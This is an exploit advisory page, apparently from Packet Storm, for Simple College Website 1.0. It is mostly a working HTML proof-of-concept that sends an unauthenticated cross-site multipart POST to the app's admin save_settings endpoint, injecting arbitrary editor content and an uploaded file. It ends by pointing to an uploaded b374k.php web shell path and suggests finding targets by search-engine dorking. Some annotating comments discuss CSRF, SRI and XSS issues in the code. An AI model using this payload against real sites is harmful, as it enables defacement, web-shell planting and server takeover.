## https://sploitus.com/exploit?id=PACKETSTORM:180360
=============================================================================================================================================  
| # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or another search engine.
  
[+] Part 01 : about-us.php  
  
[+] This payload injects code of your choice into the database via Froala, a WYSIWYG editor (v4.2.1).
  
[+] Line 109 : Send the form data using fetch API (Set your target url)  
  
[+] save payload as poc.html  
  
[+] payload :   
  
  
<!doctype html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Settings Management</title>
  <!-- Froala Editor 4.0.1 stylesheet (the advisory text above names editor 4.2.1).
       Loaded from a CDN with no integrity/crossorigin attributes, i.e. no SRI. -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css">
  <!-- Bootstrap 4.5.2 stylesheet, likewise without SRI -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <style>
    /* Cover-image preview: scale down to the container, keep aspect ratio */
    #cimg {
      max-width: 100%;
      height: auto;
    }

    /* Full-viewport translucent overlay; inserted by start_load() and removed by end_load() */
    #preloader2 {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0, 0, 0, 0.5);
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999;
    }

    /* Simple stacked form layout */
    .form-group {
      margin-bottom: 1rem;
    }

    .form-group label {
      display: block;
      margin-bottom: .5rem;
    }

    .form-group input,
    .form-group textarea {
      width: 100%;
      padding: .5rem;
      box-sizing: border-box;
    }
  </style>
</head>
  
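<body>
  <div class="container">
    <!-- No action attribute: the jQuery submit handler further down intercepts the submit
         and posts the FormData to the ajax.php save_settings endpoint. The form carries no
         anti-CSRF token field. -->
    <form id="manage-settings" method="post" enctype="multipart/form-data">
      <div class="form-group">
        <label for="name">Name</label>
        <input type="text" id="name" name="name" required>
      </div>
      <div class="form-group">
        <label for="email">Email</label>
        <input type="email" id="email" name="email" required>
      </div>
      <div class="form-group">
        <label for="contact">Contact</label>
        <input type="tel" id="contact" name="contact" required>
      </div>
      <!-- The contact group above was left unclosed originally, which nested the remaining
           groups inside it; the closing tag is now in place. -->
      <div class="form-group">
        <label for="about">About Content</label>
        <!-- A Froala editor is attached to this textarea by the ready handler below -->
        <textarea class="text-jqte" id="about" name="about_us"></textarea>
      </div>
      <div class="form-group">
        <label for="img">Cover Image</label>
        <!-- accept is a client-side filter only; the receiving server has to validate the
             uploaded file's type and extension itself -->
        <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">
        <img id="cimg" src="" alt="Selected Image Preview">
      </div>
      <button type="submit" class="btn btn-primary">Save Settings</button>
    </form>
  </div>

  <!-- Media viewer used by viewer_modal(). No element with the ids uni_modal, confirm_modal
       or alert_toast exists in this document, so the helpers that reference them operate on
       empty jQuery sets here. -->
  <div class="modal fade" id="viewer_modal" role="dialog">
    <div class="modal-dialog modal-md" role="document">
      <div class="modal-content">
        <button type="button" class="btn-close" data-dismiss="modal" aria-label="Close"><span class="fa fa-times" aria-hidden="true"></span></button>
        <img src="" alt="">
      </div>
    </div>
  </div>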
  
<!-- jQuery 3.6.0. The inline script below calls $ at parse time, so these three tags must
     stay in this order and cannot be given defer/async. -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<!-- Froala Editor JS 4.0.1 (the advisory text names 4.2.1; the PoC itself loads 4.0.1) -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>
<!-- Bootstrap JS (for modals). None of the three CDN scripts carry integrity/crossorigin
     attributes, so there is no SRI protection against a modified CDN copy. -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>
  
<script>  
/**
 * Show a local preview of the chosen cover image in #cimg.
 *
 * @param {HTMLInputElement} input - file input whose first selected file is previewed
 * @param {*} _this - unused; kept because the inline onchange calls displayImg(this, this)
 */
function displayImg(input, _this) {
  const files = input.files;
  if (!files || !files[0]) {
    return;
  }
  const reader = new FileReader();
  reader.onload = (evt) => {
    $('#cimg').attr('src', evt.target.result);
  };
  reader.readAsDataURL(files[0]);
}
  
// Once the DOM is ready, turn the .text-jqte textarea into a Froala WYSIWYG editor.
// The instance reference is never used afterwards, so it is not kept.
$(function () {
  new FroalaEditor('.text-jqte');
});
  
// Intercepts the form's submit and sends it with jQuery instead of a normal navigation.
$('#manage-settings').submit(function (e) {
  e.preventDefault();
  start_load(); // the overlay is only removed by end_load(), which this handler never calls
  $.ajax({
    // Hard-coded target: the admin save_settings action of the application under test.
    // This is a multipart POST from a page the target did not serve and the form carries no
    // CSRF token, so a successful save means the endpoint does not verify one. No
    // xhrFields/withCredentials is set either, so when poc.html is opened from another origin
    // the browser attaches no cookies — NOTE(review): if the save still succeeds, the endpoint
    // is not checking a session; confirm how it authenticates.
    url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',
    data: new FormData($(this)[0]), // every field, including the about_us editor HTML and the img file
    cache: false,
    contentType: false, // let the browser set multipart/form-data and its boundary
    processData: false, // send the FormData object as-is
    method: 'POST',
    type: 'POST', // legacy alias of method; harmless duplicate
    error: err => {
      console.log(err);
    },
    success: function (resp) {
      if (resp == 1) { // loose compare: the endpoint is expected to answer with the text "1"
        alert_toast('Data successfully saved.', 'success'); // no #alert_toast element exists in this page
        setTimeout(function () {
          location.reload();
        }, 1000);
      }
    }
  });
});
  
// Insert the full-viewport #preloader2 overlay (styled in the head) as the first child of <body>.
window.start_load = function () {
  const overlay = $('<div>', { id: 'preloader2' });
  overlay.prependTo('body');
};
  
// Fade the #preloader2 overlay out quickly, then drop it from the DOM.
window.end_load = function () {
  const overlay = $('#preloader2');
  overlay.fadeOut('fast', function onFaded() {
    $(this).remove();
  });
};
  
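/**
 * Open #viewer_modal showing the media at $src: a <video> for .mp4, an <img> otherwise.
 *
 * Fixes relative to the original:
 *  - The element used to be built by string concatenation ("<img src='" + $src + "' />"),
 *    so a $src containing a quote could inject markup into the page (DOM XSS). The element
 *    is now created empty and $src is assigned with .attr(), which does no HTML parsing.
 *  - The extension was taken from split('.')[1], which picks the wrong segment for names
 *    with more than one dot; the last segment is used instead.
 *
 * @param {string} $src - URL of the image or video to display
 */
window.viewer_modal = function ($src = '') {
  start_load();
  const ext = String($src).split('.').pop();
  let view;
  if (ext === 'mp4') {
    view = $('<video>', { controls: true, autoplay: true });
  } else {
    view = $('<img>');
  }
  view.attr('src', $src); // attribute assignment, never string-built HTML
  const content = $('#viewer_modal .modal-content');
  content.find('video, img').remove();
  content.append(view);
  $('#viewer_modal').modal({
    show: true,
    backdrop: 'static',
    keyboard: false,
    focus: true
  });
  end_load();
};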
  
// Fetch a server-rendered fragment from $url, place it in #uni_modal and show the modal.
// resp is inserted with .html(), i.e. parsed as HTML, so $url must point at a trusted
// same-origin endpoint. No #uni_modal element exists in this document.
window.uni_modal = function ($title = '', $url = '', $size = "") {
  start_load();
  const onError = err => {
    console.log(err);
    alert("An error occurred");
  };
  const onSuccess = function (resp) {
    if (!resp) {
      return;
    }
    $('#uni_modal .modal-title').html($title);
    $('#uni_modal .modal-body').html(resp);
    const dialog = $('#uni_modal .modal-dialog');
    if ($size != '') {
      dialog.addClass($size);
    } else {
      dialog.removeAttr("class").addClass("modal-dialog modal-md");
    }
    $('#uni_modal').modal({ show: true, backdrop: 'static', keyboard: false, focus: true });
    end_load();
  };
  $.ajax({ url: $url, error: onError, success: onSuccess });
};
  
// Wire #confirm_modal's confirm button to call $func($params...) and show the modal.
// NOTE(review): the handler is assembled as source text ($func + "(" + params + ")") and
// stored in an onclick attribute, so every string in $params is evaluated as JavaScript;
// callers must never pass untrusted values here. No #confirm_modal element exists in this
// document.
window._conf = function ($msg = '', $func = '', $params = []) {
  const call = `${$func}(${$params.join(',')})`;
  const modal = $('#confirm_modal');
  modal.find('#confirm').attr('onclick', call);
  modal.find('.modal-body').html($msg);
  modal.modal('show');
};
  
// Colour #alert_toast by $bg (success/danger/info/warning), set its body to $msg
// (inserted as HTML) and show it for 3 s. No #alert_toast element exists in this
// document, so here every call effectively operates on an empty jQuery set.
window.alert_toast = function ($msg = 'TEST', $bg = 'success') {
  const toast = $('#alert_toast');
  toast.removeClass('bg-success bg-danger bg-info bg-warning');

  let bgClass = '';
  switch ($bg) {
    case 'success': bgClass = 'bg-success'; break;
    case 'danger': bgClass = 'bg-danger'; break;
    case 'info': bgClass = 'bg-info'; break;
    case 'warning': bgClass = 'bg-warning'; break;
  }
  if (bgClass) {
    toast.addClass(bgClass);
  }

  toast.find('.toast-body').html($msg);
  toast.toast({ delay: 3000 }).toast('show');
};
</script>  
</body>  
  
</html>  
  
[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================